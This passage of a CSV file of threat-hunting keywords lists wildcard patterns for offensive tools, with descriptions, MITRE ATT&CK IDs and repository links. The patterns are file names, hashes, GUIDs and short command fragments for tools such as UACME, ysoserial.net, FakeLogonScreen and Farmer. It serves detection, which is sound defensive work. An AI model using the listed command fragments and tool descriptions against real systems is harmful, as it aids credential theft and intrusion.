TA0004,N/A,N/A,Credential Access,https://github.com/SecuraBV/Timeroast,1,1,N/A,10,2,152,16,2023-07-04T07:12:57Z,2023-01-18T09:04:05Z -*eyewitness -f urls.txt --web*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-f BinaryFormatter -g PSObject -o base64 -c *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*-f Json.Net -g ObjectDataProvider -o raw -c *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*-f payloads_examples/calc.*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,0,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*f1zm0/acheron*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*f1zm0/hades*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows 
AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*F3C62326-E221-4481-AC57-EF7F76AAF27B*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*f4081a8e30f75d46.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*F5BIG-Scanner.py*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation 
tools,https://github.com/jiansiting/CVE-2020-5902,1,0,N/A,N/A,1,6,5,2020-07-07T02:03:40Z,2020-07-07T02:03:39Z -*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z 
-*FA0DAF13-5058-4382-AE07-65E44AFB5592*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*Fadi002/unshackle*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*Fake Computer Objects Honey Pots*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Fake Service Accounts Honey Tokens*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - 
T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*fake_ap.py*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*fake_common_roots.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*fake_default_wordlist.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*fake_evernote_clipper*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*fake_flash_update*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*fake_lastpass/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*fake_notification_ff/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*FakeAMSI.c*,offensive_tool_keyword,FakeAMSI,Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. 
processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence,T1117 - T1027,TA0003 ,N/A,N/A,Persistence,https://github.com/gtworek/PSBits/tree/master/FakeAMSI,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*FakeAMSI.dll*,offensive_tool_keyword,FakeAMSI,Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence,T1117 - T1027,TA0003 ,N/A,N/A,Persistence,https://github.com/gtworek/PSBits/tree/master/FakeAMSI,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*FakeAMSI.exe*,offensive_tool_keyword,FakeAMSI,Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence,T1117 - T1027,TA0003 ,N/A,N/A,Persistence,https://github.com/gtworek/PSBits/tree/master/FakeAMSI,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*FakeCmdLine.*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*FakeDriver.java*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*FakeDriver2.java*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*fakefuse.c*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z
-*fakefuse.h*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z
-*FakeImageExploiter*,offensive_tool_keyword,FakeImageExploiter,This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.,T1564 - T1218 - T1204 - T1558.001,TA0002 - TA0008 - TA0010,N/A,N/A,Phishing,https://github.com/r00t-3xp10it/FakeImageExploiter,1,1,N/A,N/A,9,843,356,2019-12-06T20:59:26Z,2017-04-04T20:53:47Z
-*fakelogonscreen *,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,0,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z
-*fakelogonscreen*.zip*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z
-*FakeLogonScreen.csproj*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z
-*fakelogonscreen.exe*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z
-*FakeLogonScreen.sln*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z
-*fakepath31337*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z
-*FakePPID.*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*fake-sms-main*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense 
Evasion,https://github.com/Narasimha1997/fake-sms,1,1,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z
-*faketime '202* zsh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*farmer.exe *\windows\temp*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z
-*farmer.exe 8888 60*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z
-*Farmer\Farmer.csproj*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z
-*Farmer-main.zip*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,1,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z
-*fastfuz-chrome-ext*files.txt*,offensive_tool_keyword,fastfuzz,Fast fuzzing websites with chrome extension,T1110,TA0006,N/A,N/A,Web Attacks,https://github.com/tismayil/fastfuz-chrome-ext,1,1,N/A,N/A,1,23,3,2022-02-04T02:15:51Z,2022-02-04T00:22:51Z
-*FastjsonScan.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z
-*fasttrack/wordlist.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*fatal: buffer_get_string: bad string*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of 
False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-*favfreak-http*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*fcfhplploccackoneaefokcmbjfbkenj*,greyware_tool_keyword,1clickVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*fcrackzip *,offensive_tool_keyword,fcrackzip,a Free/Fast Zip Password Cracker,T1473 - T1021.002,TA0005 - TA0008,N/A,N/A,Credential Access,https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*fcrackzip *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*fcrackzip -u -v -D -p *.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*fdcgdnkidjaadafnichfpabhfomcebme*,greyware_tool_keyword,ZenMate VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*fde1b109f9704ff7.css*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
